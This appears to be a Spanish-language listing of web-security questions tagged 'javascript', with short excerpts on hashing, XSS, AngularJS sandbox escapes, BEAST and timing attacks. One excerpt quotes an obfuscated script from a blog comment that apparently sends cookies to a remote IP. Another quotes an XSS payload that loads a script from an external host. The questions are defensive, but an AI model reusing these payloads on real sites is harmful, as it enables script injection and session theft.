Preguntas con etiqueta 'javascript'

preguntas con etiqueta
2
respuestas

¿Tiene sentido hacer un hash de un ID de sesión antes de pasarlo a un socio publicitario?

Mi empresa tiene una tienda web. Trabajamos con un socio que otorga cupones de descuento a nuestros clientes después de que compran (los cupones se pueden usar en otras tiendas en línea) y también entregan cupones para nuestra tienda a clientes...
hecha 23.05.2013 - 10:27
5
respuestas

¿Cómo hacer el hashing de la contraseña del lado del cliente con BCrypt? [duplicar]

Estoy migrando una aplicación antigua que usaba hash MD5 a Spring Security con codificación de contraseñas de BCrypt. Quiero codificar la contraseña en la página de creación de nuevo usuario, cambiar la página de contraseña y en la página de i...
hecha 08.07.2015 - 11:19
1
respuesta

Vulnerabilidad en el marco de JavaScript popular (Angularjs)

Encontré un error que te permite escapar de la caja de arena de la plantilla de AngularJS. Angular es un lenguaje de plantillas basado en el bigote. Te permite poner expresiones que son evaluadas en tu html. Por ejemplo, {{1 + 1}} se representa...
hecha 22.07.2016 - 01:49
3
respuestas

Para un usuario final, ¿es HTML5 / JavaScript más seguro que Flash?

No estoy hablando de la seguridad del lado del servidor o incluso de las vulnerabilidades de XSS, ya que estos son ataques a servicios vulnerables y no utilizan ninguna vulnerabilidad preexistente en el lado del cliente para afectar a un usuario...
hecha 28.11.2015 - 04:02
3
respuestas

Encontré un código ofuscado en un comentario en mi blog. ¿Qué tengo que hacer?

Hoy estuve revisando comentarios en mi blog y encontré un comentario extraño, aquí está el texto exacto <script>var _0x352a=["\x31\x31\x34\x2E\x34\x35\x2E\x32\x31\x37\x2E\x33\x33\x2F\x76\x6C\x6B\x2E\x70\x68\x70","\x63\x6F\x6F\x6B\x69\x65...
hecha 07.08.2013 - 18:02
6
respuestas

Solución para permitir la entrada de JavaScript pero evitar XSS

Tenemos un sistema de blog simple que permite a los usuarios ingresar html y JavaScript para crear una página de blog. Soy consciente de que permitir que javascript abra la puerta a los ataques xss. Sin embargo, necesitamos permitir que los usua...
hecha 30.06.2011 - 09:20
3
respuestas

¿Qué tan graves son los ataques XSS?

Un sitio web que visito permite que este tipo de ataque se implemente con GET en la URL <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> Junto con muchos otros en esta página: enlace El sitio requiere una cuenta (generalmen...
hecha 21.10.2011 - 17:43
5
respuestas

¿Qué puedo hacer con respecto a la vulnerabilidad de inyección de JavaScript de TLS 1.0 en mi servidor?

El reciente artículo publicado en slashdot enlace dice que las conexiones aseguradas con TLS 1.0 son susceptibles al descifrado del hombre en el medio (la explotación BESTIA). Tengo una aplicación alojada en Google Appengine, que parece usar T...
hecha 22.09.2011 - 15:14
1
respuesta

¿Cómo se puede usar SharedArrayBuffer para sincronizar ataques?

   Dado que esta nueva clase de ataques implica medir intervalos de tiempo precisos, como mitigación parcial ya corto plazo, estamos inhabilitando o reduciendo la precisión de varias fuentes de tiempo en Firefox. La precisión de performance.now...
hecha 08.01.2018 - 06:32
6
respuestas

¿Cómo validar si una biblioteca de JavaScript es segura?

Soy el desarrollador principal de una biblioteca de código abierto de JavaScript. Esa biblioteca se utiliza en la empresa para la que trabajo, para varios clientes. De vez en cuando hay un cliente que se siente paranoico con respecto a la implem...
hecha 26.10.2012 - 03:02